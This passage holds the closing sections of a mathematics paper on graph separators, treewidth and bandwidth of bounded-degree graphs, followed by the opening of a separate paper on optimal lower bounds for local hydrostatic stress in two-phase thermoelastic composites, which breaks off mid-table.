\item\label{it:Sep_Konstr_2} Find a subset $W_i \subseteq V_i$ with $|W_i| \le
|V_i|/2$ and $|N_{G_i}(W_i)| \le \eps |W_i|$.
\item Set $S_i:= N_{G_i}(W_i)$, $V_{i+1}:=V_i \setminus (W_i \cup S_i)$.
\item If $|V_{i+1}| \ge\frac23n$ then set $i:=i+1$ and go to step (\ref{it:Sep_Konstr_1}).
\item Set $i^*:=i$ and return
$$
A:=\bigcup_{i=1}^{i^*} W_i, \quad B:= V_{i^*+1}, \quad S:=\bigcup_{i=1}^{i^*} S_i .
$$
\end{enumerate}
This construction obviously returns a partition $V = A \dot\cup B \dot\cup S$
with $|B| <\frac23n$.
Moreover,
$|V_{i^*}| \ge \frac23 n$ and $|W_{i^*}| \le |V_{i^*}|/2$ and hence
\begin{equation*}\begin{split}
|A| = n - |B| - |S| = n - |V_{i^*+1}| - |S| = \\
n - ( |V_{i^*}| - |W_{i^*}| - |S_{i^*}|) - |S| \le
n - \frac{|V_{i^*}|}{2} \le \frac23 n.
\end{split}\end{equation*}
The upper bound on $|S|$ follows easily since
$$
|S| = \sum_{i=1}^{i^*} |N_{G_i}(W_i)| \le \sum_{i=1}^{i^*} \eps|W_i|
= \eps |A| \le \frac23 \eps n.
$$
It remains to show that $S$ separates $G$. This is indeed the case as
$N_G(A) \subseteq S$ by construction and thus $E(A, B) = \emptyset$.
\end{proof}
Now we can prove Theorem~\ref{thm:bound-trw}. As remarked earlier,
Grohe and Marx~\cite{GroMar} independently gave a proof of an equivalent result
which employs similar ideas but does not use separators explicitly.
\begin{proof}[of Theorem~\ref{thm:bound-trw}]
Let $G=(V,E)$ be a graph on $n$ vertices, $\eps > 0$, and let $b \ge
b_{\eps}(G)$.
It follows immediately from the definition of boundedness that every subgraph $G'
\subseteq G$ with $G'=(V',E')$ and $|V'| \ge 2b$ also has $b_{\eps}(G') \le b$.
We now prove Theorem~\ref{thm:bound-trw} by induction on the size of $G$.
The relation
$\trw(G) \le 2 \eps n + 2b$ trivially holds if $n\le 2b$. So let $G$ have $n >
2b$ vertices and assume that the theorem holds for all graphs with less than $n$
vertices. Then $G$ is $(b, \eps)$-bounded and thus has a $(2\eps
n/3,2/3)$-separator $S$ by Lemma~\ref{lem:bound-sep}. Assume that $S$ separates
$G$ into the two subgraphs $G_1=(V_1,E_1)$ and $G_2=(V_2,E_2)$. Let
$(\mathcal{X}_1,T_1)$ and $(\mathcal{X}_2,T_2)$ be tree decompositions of $G_1$
and $G_2$, respectively, such that $\mathcal{X}_1\cap\mathcal{X}_2=\emptyset$. We
use them to construct a tree decomposition $(\mathcal{X},T)$ of $G$ as follows.
Let $\mathcal{X} = \{ X_i \cup S : X_i \in\mathcal{X}_1\} \cup \{ X_i \cup S :
X_i \in\mathcal{X}_2\}$ and $T = (I_1 \cup I_2, F = F_1 \cup F_2 \cup \{e\})$
where $e$ is an arbitrary edge between the two trees. This is indeed a tree
decomposition of $G$: Every vertex $v \in V$ belongs to at least one $X_i \in
\mathcal{X}$ and for every edge $\{v,w\} \in E$ there exists $i \in I$ (where $I$
is the index set of $\mathcal{X}$) with $\{v,w\} \subseteq X_i$. This is trivial
for $\{v,w\} \subseteq V_i$ and follows from the definition of $\mathcal{X}$ for
$v \in S$ and $w \in V_i$. Since $S$ separates $G$ there are no edges $\{v,w\}$
with $v \in V_1$ and $w \in V_2$. For the same reason the third property of a
tree decomposition holds: if $j$ lies on the path from $i$ to $k$ in $T$, then
$X_i \cap X_k \subseteq X_j$ as the intersection is $S$ if $X_i, X_k$ are subsets
of $V_1$ and $V_2$ respectively.
We have seen that $(\mathcal{X},T)$ is a tree decomposition of $G$ and
can estimate its width as follows: $\trw(G) \le \max\{\trw(G_1), \trw(G_2)\} +
|S|$. With the induction hypothesis we get
\begin{align*}
\trw(G) &\le \max\{2\eps\cdot|V_1|+2b,\,\,2\eps\cdot |V_2|+2b\} + |S|\\
&\le 2 \eps n + 2b.
\end{align*}
where the second inequality follows from $|V_i| \le (2/3)n$
and $|S|\le (2\eps n)/3$.
\end{proof}
\section{Applications}
\label{sec:appl}
For many interesting bounded degree graph classes (non-trivial) upper bounds
on the bandwidth are not at hand. A wealth of results however has been obtained
about the existence of sublinear separators. This illustrates the importance
of Theorem~\ref{thm:main}. In this section we will give examples of such
separator theorems and provide applications of them in
conjunction with Theorem~\ref{thm:main}.
\subsection{Separator theorems}\label{subsec:separators}
A classical result in the theory of planar graphs concerns the existence of
separators of size~$2\sqrt{2n}$ in any planar graph on~$n$ vertices proved by
Lipton and Tarjan~\cite{LipTar} in 1977. Clearly, together with
Theorem~\ref{thm:sep-band} this result implies the following theorem.
\begin{corollary}
\label{cor:planar}
Let $G$ be a planar graph on $n$ vertices with maximum degree at
most~$\Delta\ge 2$. Then the bandwidth of $G$ is bounded from above by
\[
\bdw(G) \le \frac{15n}{\log_\Delta(n)}.
\]
\end{corollary}
It is easy to see that the bound in Corollary~\ref{cor:planar} is sharp up to
the multiplicative constant -- since the bandwidth of any graph $G$ is bounded from below by
$(n-1)/\mbox{diam}(G)$, it suffices to consider for example the complete binary tree on $n$ vertices.
Corollary~\ref{cor:planar} is used in~\cite{CDMW} to infer a result about the
geometric realisability of planar graphs $G=(V,E)$ with $|V|=n$ and $\Delta(G)\le\Delta$.
This motivates why we want to consider some generalisations of the planar
separator theorem in the following. The first such result is due to Gilbert,
Hutchinson, and Tarjan~\cite{GilHutTar} and deals with graphs of arbitrary
genus.
\footnote{Again, the separator theorems we refer to bound the size of a
separator in $G$. Since the class of graphs with genus less than $g$
(or, respectively, of $H$-minor free graphs) is closed under taking subgraphs however, this
theorem can also be applied to such subgraphs and thus the bound on~$\s(G)$
follows.}
\begin{theorem}[\cite{GilHutTar}]
\label{thm:sep-genus}
An $n$-vertex graph $G$ with genus $g \ge 0$ has separation
number $\s(G) \le6\sqrt{gn}+2\sqrt{2n}$.
\end{theorem}
For fixed $g$ the class of all graphs with genus at most $g$ is closed under
taking minors. Here $H$ is a minor of $G$ if it can be obtained from a
subgraph of~$G$ by a sequence of edge deletions and contractions. A graph $G$
is called $H$-minor free if $H$ is no minor of $G$. The famous graph minor theorem
by Robertson and Seymour~\cite{RobSeyXX} states that any minor closed class
of graphs can be characterised by a finite set of forbidden minors (such as
$K_{3,3}$ and $K_5$ in the case of planar graphs). The next separator
theorem by Alon, Seymour, and Thomas~\cite{AloSeyTho} shows that already
forbidding one minor enforces a small separator.
\begin{theorem}[\cite{AloSeyTho}]
\label{lem:sep-minor}
Let $H$ be an arbitrary graph. Then any $n$-vertex graph $G$ that is
$H$-minor free has separation number $\s(G) \le |H|^{3/2}\sqrt{n}$.
\end{theorem}
We can apply these theorems to draw the following conclusion concerning the
bandwidth of bounded-degree graphs with fixed genus or some fixed forbidden
minor from Theorem~\ref{thm:sep-band}.
\begin{corollary}\label{cor:sep}
Let $g$ be a positive integer, $\Delta\ge2$ and $H$ be
an $h$-vertex graph and $G$ an $n$-vertex graph with maximum degree
$\Delta(G)\le\Delta$.
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item If $G$ has genus $g$ then $\bdw(G)\le 15n/\log_{\Delta}(n/g)$.
\item If $G$ is $H$-minor free then $\bdw(G)\le 12n/\log_{\Delta}(n/h^3)$.
\end{enumerate}
\end{corollary}
\subsection{Embedding problems and universality}\label{subsec:universal}
A graph $H$ that contains copies of all graphs $G\in\mbox{${ \mathcal G }$}$ for some class of
graphs $\mbox{${ \mathcal G }$}$ is called \emph{universal for~$\mbox{${ \mathcal G }$}$}.
The construction of sparse universal graphs for certain families $\mbox{${ \mathcal G }$}$ has
applications in VLSI circuit design and was extensively studied (see,
e.g., \cite{AloCap} and the references therein).
In contrast to these results our focus is not on
minimising the number of edges of $H$,
but instead we are interested in giving a relatively
\emph{simple} criterion for
universality for $\mbox{${ \mathcal G }$}$ that is satisfied by \emph{many} graphs~$H$ of the
same order as the largest graph in $\mbox{${ \mathcal G }$}$.
The setting with which we are concerned here are embedding results that
guarantee that a bounded-degree graph $G$
can be embedded into a graph $H$ with sufficiently high minimum
degree, even when $G$ and $H$ have the same number of vertices.
Dirac's theorem~\cite{Dir} concerning the existence of Hamiltonian cycles in
graphs of minimum degree $n/2$ is a classical example for theorems of this type.
It was followed by results of Corr\'adi and
Hajnal~\cite{CorHaj}, Hajnal and Szemer\'edi~\cite{HajSze} about embedding
$K_r$-factors, and more recently by a series of theorems due to Koml\'os, Sark\"ozy, and
Szemer\'edi and others
which deal with powers of Hamiltonian cycles, trees, and $H$-factors (see,
e.g., the survey~\cite{KOSurvey}). Along the lines of these results the
following unifying conjecture was made by Bollob\'as and Koml\'os~\cite{Kom99}
and recently proved by B\"ottcher, Schacht, and Taraz~\cite{BST09}.
\begin{theorem}[\cite{BST09}]
\label{thm:bolkom}
For all $r,\Delta\in\mathbb{N}$ and $\gamma>0$, there exist constants $\beta>0$ and
$n_0\in\mathbb{N}$ such that for every $n\geq n_0$ the following holds.
If~$G$ is an $r$-chromatic graph on~$n$ vertices with $\Delta(G) \leq \Delta$ and
bandwidth at most $\beta n$ and if~$H$ is a graph on~$n$ vertices with minimum degree
$\delta(H) \geq (\frac{r-1}{r}+\gamma)n$, then $G$ can be embedded into $H$.
\end{theorem}
The proof of Theorem~\ref{thm:bolkom} heavily uses the bandwidth constraint
insofar as it constructs the required embedding sequentially, following the
ordering given by the vertex labels of $G$. Here it is of course beneficial that
the neighbourhood of every vertex $v$ in $G$ is confined to the $\beta n$
vertices which immediately precede or follow $v$.
Also, it is not difficult to see that the statement in Theorem~\ref{thm:bolkom}
becomes false without the constraint on the bandwidth: Consider $r=2$, let $G$ be
a random bipartite graph with bounded maximum degree and let $H$ be the graph
formed by two cliques of size $(1/2+\gamma)n$ each, which share exactly $2\gamma
n$ vertices. Then $H$ cannot contain a copy of $G$, since in $G$ every vertex set
of size $(1/2-\gamma)n$ has more than $2\gamma n$ neighbours. The reason for this
obstruction is again that $G$ has good expansion properties.
On the other hand, Theorem~\ref{thm:main} states that in bounded degree graphs,
the existence of a big expanding subgraph is in fact the only obstacle which can
prevent sublinear bandwidth and thus the only possible obstruction for a
universality result as in Theorem~\ref{thm:bolkom}. More precisely we immediately
get the following corollary from Theorem~\ref{thm:main}.
\begin{corollary}
If the class $\mbox{${ \mathcal C }$}$ meets one (and thus all) of the conditions in
Theorem~\ref{thm:main}, then the following is also true.
For every $\gamma>0$ and $r\in\field{N}$ there exists $n_0$ such that for all $n\ge
n_0$ and for every graph $G\in\mbox{${ \mathcal C }$}_n$ with chromatic number $r$ and for every
graph $H$ on $n$ vertices with minimum degree at least
$(\frac{r-1}{r}+\gamma)n$, the graph $H$ contains a copy of $G$.
\end{corollary}
By Corollary~\ref{cor:planar} we infer as a special case that all sufficiently
large graphs with minimum degree $(\frac34+\gamma)n$ are universal for the class
of bounded-degree planar graphs. Universal graphs for bounded degree planar
graphs have also been studied in~\cite{BCLR,Cap}.
\begin{corollary}\label{cor:planar-univers}
For all $\Delta\in\mathbb{N}$ and $\gamma>0$, there exists $n_0\in\mathbb{N}$
such that for every $n\geq n_0$ the following holds:
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item
Every $3$-chromatic planar graph on $n$ vertices with maximum degree at most
$\Delta$ can be embedded into every graph on $n$ vertices with minimum degree at
least $(\frac23+\gamma)n$.
\item
Every planar graph on $n$ vertices with maximum degree at most $\Delta$ can be
embedded into every graph on $n$ vertices with minimum degree at least
$(\frac34+\gamma)n$.
\end{enumerate}
\end{corollary}
This extends a result by K{\"u}hn, Osthus, and Taraz~\cite{KueOstTar}, who
proved that for every graph $H$ with minimum degree at least $(\frac23+\gamma)n$
\emph{there exists a particular} spanning triangulation $G$ that can be
embedded into $H$. Using Corollary~\ref{cor:sep} it is moreover possible to
formulate corresponding generalisations for graphs of fixed genus and for
$H$-minor free graphs for any fixed~$H$.
\section{Acknowledgement}
The first author would like to thank David Wood for fruitful discussions
in an early stage of this project.
In addition we thank two anonymous referees for their helpful suggestions.
\bibliographystyle{amsplain}
| 2024-02-18T23:40:06.819Z | 2009-10-16T03:08:10.000Z | algebraic_stack_train_0000 | 1,376 | 7,913 |
|
proofpile-arXiv_065-6830 | \section{Introduction}
\label{Introduction}
Over the last century major strides have been made in the characterization of effective constitutive laws relating average fluxes to average gradients inside random heterogeneous media see for example \cite{Hash, Maxwell04, Willis, Milton, NNH, Rayleigh}. However much less is known about the point wise behavior of local fluxes and gradients fields inside random media. While it is true that efficient numerical methods capable of resolving local fields are available for prescribed microstructures, it is also true that for most applications only a partial statistical description of the microstructure is available. Thus for these cases one must resort to bounds or approximations for the local fields that are based upon the available statistical descriptors of the microgeometry and the applied macroscopic loading.
Bounds are useful as they provide a means to quantitatively assess load transfer across length scales relating the excursions of the local fields to applied macroscopic loads. Moreover, they provide explicit criteria on the applied loads that are necessary for failure initiation inside statistically defined heterogeneous media \cite{AlaliLipton}. In this paper we develop lower bounds on local field properties for statistically defined two phase microstructures when only the volume fraction of each phase is known.
Here the focus is on lower bounds since volume constraints alone do not preclude the existence of microstructures with rough interfaces for which the $L^p$ norms of local fields are divergent see \cite{SeminalMilton}, \cite{faraco}, and also \cite{leonetinesi}.
We present a methodology for bounding the $L^p$ norms, $2\leq p\leq\infty$, of the local hydrostatic stress field inside random media made up of two thermoelastic materials. The method is used to obtain new optimal lower bounds that are given by explicit formulas expressed in terms of the applied thermal and mechanical loading, coefficients of thermal expansion, elastic properties, and volume fractions. We show that these bounds are the best possible in that they are attained by the local fields inside the coated sphere assemblage originally introduced in \cite{hscoated}.
It has been known since 1963 that the coated spheres microstructure exhibits extreme effective elastic properties \cite{hashin}. However it was discovered only recently in \cite{Lipstress}, \cite{Lipstrain} that this geometry supports extreme local fields that minimize the maximum local hydrostatic field over all two phase elastic mixtures in fixed volume fractions. More recently several scenarios are identified for which, in the absence of thermal stresses, these microstructures attain lower bounds on the total local stress field inside each material when the composite is subjected to mechanical loading see, \cite{AlaliLipton}.
In this paper we consider mixtures of two thermoelastic materials with shear and bulk moduli specified by $\mu_1$, $k_1$, $\mu_2$, $k_2$ and coefficients of thermal expansion given by $h_1$ and $h_2$. New lower bounds are presented for elastically well ordered phases for which $k_1>k_2$ and $\mu_1>\mu_2$ as well as for non well ordered phases such that $k_2>k_1$ and $\mu_1>\mu_2$. For each of these cases we consider both macroscopic mechanical and thermal loads and present bounds that hold for $h_1>h_2$ and $h_2>h_1$. The set of bounds and optimal microstructures for the well ordered case are listed in Section 3 and optimal lower bounds for the non well ordered case are listed in Section 4.
The methodology for deriving the bounds is presented in Section 5.
The optimal bounds and the associated coated sphere microstructures given in Sections 3 and 4 show that there are combinations of applied stress and imposed temperature change for which the local hydrostatic stress inside the connected phase of the coated sphere assemblage vanishes identically. Other loading combinations are seen to cause the stress inside the included phase of the coated sphere assemblage to vanish identically.
Thus for these cases the applied hydrostatic stress is converted into a pure local shear stress inside a preselected phase.
Recent related work provides optimal lower bounds on local fields in the absence of thermal loads.
The work presented in \cite{AlaliLipton} provides new optimal lower bounds on both the local shear stress and the local hydrostatic component of stress for random media subjected to a series of progressively more general applied macroscopic stresses. These bounds are explicit and given in terms of volume fractions, elastic constants of each phase, and the applied macroscopic stress.
Earlier work considers random two phase elastic composites subject to imposed macroscopic hydrostatic stress and strain see, \cite{Lipstrain} and \cite{Lipstress}, as well as dielectric composites subjected applied constant electric fields see, \cite{Lipelect}. Those efforts deliver optimal lower bounds on the $L^p$ norms for the hydrostatic components of local stress and strain fields as well as the magnitude of the local electric field for all $p$ in the range $2\leq p \leq \infty$. Other work examines the stress field around a single simply connected stiff elastic inclusion subjected to a remote constant stress at infinity \cite{Wheeler} and provides optimal lower bounds for the supremum of the
maximum principal stress. The work presented in \cite{GrabovskyandKohn} provides an optimal lower bound on the supremum of the maximum principal stress for two-dimensional periodic composites consisting of a single simply connected elastically stiff inclusion inside the period cell. The recent work of \cite{He} builds on the earlier work of \cite{Lipstrain, Lipstress} and develops new lower bounds on the
$L^p$ norm of the local stress and strain fields inside statistically isotropic two-phase elastic composites. However to date those bounds have been shown to be optimal for $p=2$ see, \cite{He}. Their optimality for $p>2$ remains to be seen. Optimal upper and lower bounds on the $L^2$ norm of local gradient fields
are established using integral representation formulas in \cite{lipsiama}.
We conclude by providing the notation and summation conventions used in this article. Contractions of
stress or strain fields $\sigma$ and $\epsilon$ are defined by
$\sigma:\epsilon=\sigma_{ij}\epsilon_{ij}$ and $|\sigma|^2=\sigma:\sigma$, where
repeated indices indicate summation. Products of fourth order
tensors $C$ and strain tensors $\epsilon$ are written as
$C\epsilon$ and are given by $[C\epsilon]_{ij}=C_{ijkl}\epsilon_{kl}$; and
products of stresses $\sigma$ with vectors ${\bf v}$ are
given by $[\sigma{\bf v}]_i=\sigma_{ij}v_j$. The fourth order identity
map on the space of stresses or strains is denoted by $\mathbf I$
and ${\mathbf
I}_{ijkl}=1/2(\delta_{ik}\delta_{jl}+\delta_{il}\delta_{jk})$. The
projection onto the hydrostatic part of $\sigma(\textbf{x})$ is denoted by
$\mathbb{P}^H$ and is given explicitly by
\begin{eqnarray}
\mathbb{P}^H_{ijkl}=\frac{1}{d}\delta_{ij}\delta_{kl}&\,\hbox{and}\,&\mathbb{P}^H\psi(\textbf{x})=\frac{tr\,\sigma(\textbf{x})}{d}I.
\label{proj}
\end{eqnarray}
The projection onto the deviatoric part of $\sigma(\textbf{x})$ is denoted by
$\mathbb{P}^D$ and ${\mathbf I}=\mathbb{P}^H+\mathbb{P}^D$ with $\mathbb{P}^D\mathbb{P}^H=\mathbb{P}^H\mathbb{P}^D=0$. The tensor product between two vectors $\u$ and $\v$ is the matrix $\u\otimes\v$ with elements$[\u\otimes\v]_{ij}=u_i v_j$.
Last we denote the basis for the space of constant $3\times 3$ symmetric strain tensors by $\bar{\epsilon}^{kl}$ where $\bar{\epsilon}_{mn}^{kl}=\delta_{mk}\delta_{nl}$.
\bigskip
\section{Stress and strain fields inside heterogeneous thermoelastic\\ media with imposed macroscopic loading}
\label{Prestress Problem}
Several distinct physical processes can generate prestress within heterogeneous media. In many cases it is generated by a mismatch between the coefficients of thermal expansion of the component materials. To fix ideas we present the
physical model associated with this situation. The tensors of thermal expansion inside each phase are given by $\lambda_1=h_1 I$ and $\lambda_2=h_2 I$ where $I$ is the $3\times 3$ identity. The elastic properties of each component are specified by the elasticity tensors $C_1$ and $C_2$ respectively. In this treatment we consider heterogeneous elastically isotropic materials and
the elasticity tensors of materials one and two are specified by
\begin{eqnarray}
C_i=3k_i\mathbb{P}^H+2\mu_i\mathbb{P}^D, \hbox{ $i=1,2.$}
\label{elastconst}
\end{eqnarray}
Without loss of generality we adopt the convention
\begin{eqnarray}
\mu_1>\mu_2.
\label{order}
\end{eqnarray}
The elastic displacement inside the composite is denoted by $\textbf{u}$ and the associated strain tensor is denoted by $\epsilon (\textbf{u})$. The position dependent elastic tensor and thermal expansion tensor for the heterogeneous medium are denoted by $C(\textbf{x})$ and $\lambda(\textbf{x})$ respectively where $\textbf{x}$ denotes a point inside the medium. The domain containing the composite is given by a cube $Q$ of unit side length. Here is supposed that $Q$ is the period cell for an infinite elastic medium. In what follows the integral of a quantity $q$ over the unit cube $Q$ is denoted by $\langle q \rangle$.
A constant macroscopic stress $\overline{\sigma}$ and uniform change in temperature $\Delta T$ is imposed upon the heterogeneous material. The local stress inside the heterogeneous medium is expressed as the sum of a periodic mean zero fluctuation $\hat{\sigma}$
and $\overline{\sigma}$, i.e., $\sigma(\textbf{x})=\overline{\sigma}+\hat\sigma(\textbf{x})$ with $\langle\hat{\sigma}\rangle=0$. Elastic equilibrium inside each phase is given by:
\begin{eqnarray}
div \sigma =0.
\label{equlib}
\end{eqnarray}
The local elastic strain $\epsilon(\u)$ is related to the local stress through the constitutive law
\begin{eqnarray}
\sigma(\textbf{x})=C(\textbf{x})(\epsilon (\textbf{u}(\textbf{x}))-\lambda(\textbf{x})\Delta T),
\label{constitutive}
\end{eqnarray}
and the local elastic field is written in the form
\begin{eqnarray}
\epsilon(\u)=\overline{\epsilon}+\epsilon(\u^{per})
\label{epsilon}
\end{eqnarray}
where $\u^{per}$ is $Q$ periodic taking the same values on opposite sides of the period cell
and $\langle\epsilon(\u^{per})\rangle=0$.
Perfect contact between the component materials is assumed, thus
both the displacement ${\u}$ and traction $\sigma\textbf{n}$ are
continuous across the two phase interface, i.e.,
\begin{eqnarray}
\label{equlibbdry1}
{\u}_{|_{\scriptscriptstyle{1}}}&=&{\u}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2}
\sigma_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&\sigma_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
Here the subscripts indicate the side of the interface
that the displacement and traction fields are evaluated on and $\textbf{n}$ denotes the normal vector to the interface pointing from material one into material two.
The effective ``macroscopic'' constitutive law for the heterogeneous medium is given by the constant effective elasticity tensor $C^e$ and effective thermal stress tensor $H^e$ that provide the linear relation between the imposed macroscopic stress $\bar{\sigma}$, uniform change in temperature $\Delta T$, and the average strain $\bar{\epsilon}$ given by \cite{Milton},
\begin{eqnarray}
\bar{\sigma}=C^e\bar{\epsilon}+H^e \Delta T.
\label{effelast}
\end{eqnarray}
Here the components of $C^e$ are given by
\begin{eqnarray}
C^e_{ijkl}=\langle C_{ijmn}(x)(\epsilon(\varphi^{kl})_{mn}+\bar{\epsilon}^{kl}_{mn})\rangle,
\label{effectelast}
\end{eqnarray}
where the fields $\varphi^{ij}$ are the periodic solutions of
\begin{eqnarray}
div (C(x)(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}))= 0 \quad\text{inside each phase },
\label{basis}
\end{eqnarray}
with the appropriate traction and continuity conditions along the two phase interface given by
\begin{eqnarray}
\label{equlibbdry1e}
{\varphi^{kl}}_{|_{\scriptscriptstyle{1}}}&=&{\varphi^{kl}}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2e}
C_1\left(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}\right)_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&C_2\left(\epsilon(\varphi^{kl})+\bar{\epsilon}^{kl}\right)_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
The effective thermal stress tensor $H^e$ is given by
\begin{eqnarray}
H^e=\langle C(x)(\epsilon(\varphi^p)-\lambda(\textbf{x})) \rangle.
\label{effectethstress}
\end{eqnarray}
Where $\varphi^p$ is the periodic solution of
\begin{eqnarray}
div (C(x)(\epsilon({\varphi}^p)-\lambda(\textbf{x})))= 0 \quad\text{inside each phase },
\label{prestressequlib}
\end{eqnarray}
with the traction and continuity conditions along the two phase interface given by
\begin{eqnarray}
\label{equlibbdry1p}
{\varphi^p}_{|_{\scriptscriptstyle{1}}}&=&{\varphi^p}_{|_{\scriptscriptstyle{2}}},\,\,\\
\label{equlibbdry2p}
C_1\left(\epsilon(\varphi^p)-\lambda_1\right)_{|_{\scriptscriptstyle{1}}} \textbf{n}&=&C_2\left(\epsilon(\varphi^p)-\lambda_2\right)_{|_{\scriptscriptstyle{2}}} \textbf{n}.
\end{eqnarray}
From linearity it follows that the local fluctuating strain field is
given by the sum
\begin{eqnarray}
\epsilon(\u^{per})=\epsilon(\varphi^{kl})\bar{\epsilon}^{kl}+\epsilon(\varphi^p)\Delta T.
\label{linear}
\end{eqnarray}
We write $\varphi^e=\varphi^{kl}\bar{\epsilon}^{kl}$ and from linearity one has the expression for $C^e\bar{\epsilon}$ given by
\begin{eqnarray}
\label{otherconstitut}
C^e\bar{\epsilon}=\langle C(\textbf{x})(\epsilon(\varphi^e)+\bar{\epsilon}\rangle.
\end{eqnarray}
In this article the imposed mechanical stress is given by a constant hydrostatic stress
\begin{eqnarray}
\bar{\sigma}=\sigma_0 I,
\label{imposedstress}
\end{eqnarray}
where $\sigma_0$ can assume any value in $-\infty<\sigma_0<\infty$.
We introduce a method for obtaining optimal lower bounds on the higher moments of the hydrostatic component
of the local stress inside the composite when it is subjected to an imposed hydrostatic load $\sigma_0 I$ and temperature change $\Delta T$. Here no restriction is placed on $\Delta T$.
The volume fractions of materials one and two are denoted by $\theta_1$ and $\theta_2$ and the average of a quantity $q$ over material one is denoted by $\langle q\rangle_1$ and over material two by $\langle q \rangle_2$.
In the following section we present optimal lower bounds on the following moments of the local hydrostatic stress $\mathbb{P}^H\sigma(\textbf{x})$ over the domain occupied by each material
given by
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma(\textbf{x})|^p\rangle_1^{1/p} &\hbox{ and }&\langle|\mathbb{P}^H\sigma(\textbf{x})|^p\rangle_2^{1/p},
\label{locstressmoment}
\end{eqnarray}
for $1< p\leq\infty$,
as well as for the maximum local hydrostatic stress over the whole composite domain
\begin{eqnarray}
\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}.
\label{locstressmaxeverything}
\end{eqnarray}
It is pointed out that the case corresponding to $p=\infty$ in (\ref{locstressmoment}) corresponds to
lower bounds on the maximum local stress over each phase
\begin{eqnarray}
\max_{\textbf{x}\hbox{ \tiny in material 1}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}, && \max_{\textbf{x}\hbox{ \tiny in material 2}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\},
\label{locstressmaxphase}
\end{eqnarray}
The lower bounds are given in terms of the volume fractions $\theta_1$ and $\theta_2$, as well as the bulk and shear moduli $k_1$, $k_2$, $\mu_1$, $\mu_2$, and the coefficients of thermal expansion $h_1$ and $h_2$. The lower bounds are described by the following characteristic combinations of these parameters given by:
\begin{eqnarray}
L_1&=& \frac{k_1(k_2+\frac{4}{3}\mu_2)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_2},\label{L1}\\
L_2&=& \frac{k_2(k_1+\frac{4}{3}\mu_1)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_1},\label{L2}\\
M_1&=& \frac{k_1(k_2+\frac{4}{3}\mu_1)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_1},\label{M1}\\
M_2&=& \frac{k_2(k_1+\frac{4}{3}\mu_2)}{k_1k_2+(k_1\theta_1+k_2\theta_2)\frac{4}{3}\mu_2},\label{M2}
\end{eqnarray}
\begin{eqnarray}
D&=&\Delta T(\frac{3k_1k_2(h_2-h_1)}{k_2-k_1}),\label{D}
\end{eqnarray}
and
\begin{eqnarray}
F&=&D(1-\frac{1}{\frac{L_1+M_2}{2}}).
\label{F}
\end{eqnarray}
For elastically well--ordered materials, $k_1>k_2$
one has $L_1>1>L_2$, and $M_1>1>M_2$; for the non well--ordered case $k_2>k_1$, one has $L_2>1>L_1$ and $M_2>1>M_1$.
The lower bounds are shown to be obtained by the local fields inside the coated sphere assemblages introduced in \cite{hscoated}.
The lower bounds presented here include the effects of thermal stresses due to thermal loads and reduce to the optimal bounds reported in \cite{Lipstress} when $\Delta T=0$.
\section{Lower bounds on local stress for elastically well-ordered thermoelastic composite media}
\label{sec-optstresshydrowell}
In this section it is
assumed that the materials inside the heterogeneous medium are elastically well-ordered, i.e., $\mu_1>\mu_2$ and $\kappa_1>\kappa_2$.
We present lower bounds that are optimal for the full range of imposed hydrostatic stresses, i.e., $-\infty<\sigma_0<\infty$ as well as for unrestricted choices of $\Delta T$. The configurations that attain the bounds are given by the coated sphere assemblages \cite{hscoated}. To fix ideas we describe the coated sphere assemblage made from a core of material one with a coating of material two.
We first fill the cube $Q$ with an assemblage of spheres with sizes ranging down to the infinitesimal. Inside each sphere
one places a smaller concentric sphere filled with ``core'' material
one and the surrounding coating is filled with material two. The volume fractions of material one and two are taken to be the same for all of the coated spheres.
In what follows we list the lower bounds for the well ordered case. These bounds are derived in Section 5. Their optimality follows from explicit formulas for the moments of the local fields inside the coated sphere assemblage, these are discussed and presented in Section 5.
The first set of bounds apply to all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$ for $1< p\leq\infty$.
We suppose that $h_2>h_1$ fix $\Delta T$ and list the bounds as a function of the imposed macroscopic stress $\sigma_0$. The bounds are displayed in the following table where the optimal microstructures are given by the coated spheres construction. The coating and core phase of the optimal configuration is listed in the table below.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq
\sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1 \\ \hline
D\leq \sigma_0\leq D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)M_2-D]& Core material 1 and coating material 2\\ \hline
D(1-\frac{1}{M_2})< \sigma_0< D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0& Optimality undetermined \\ \hline
D(1-\frac{1}{L_2})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Next we suppose that $h_1>h_2$ and present optimal lower bounds on $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$, for $1< p\leq\infty$. The bounds and associated optimal microstructures are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
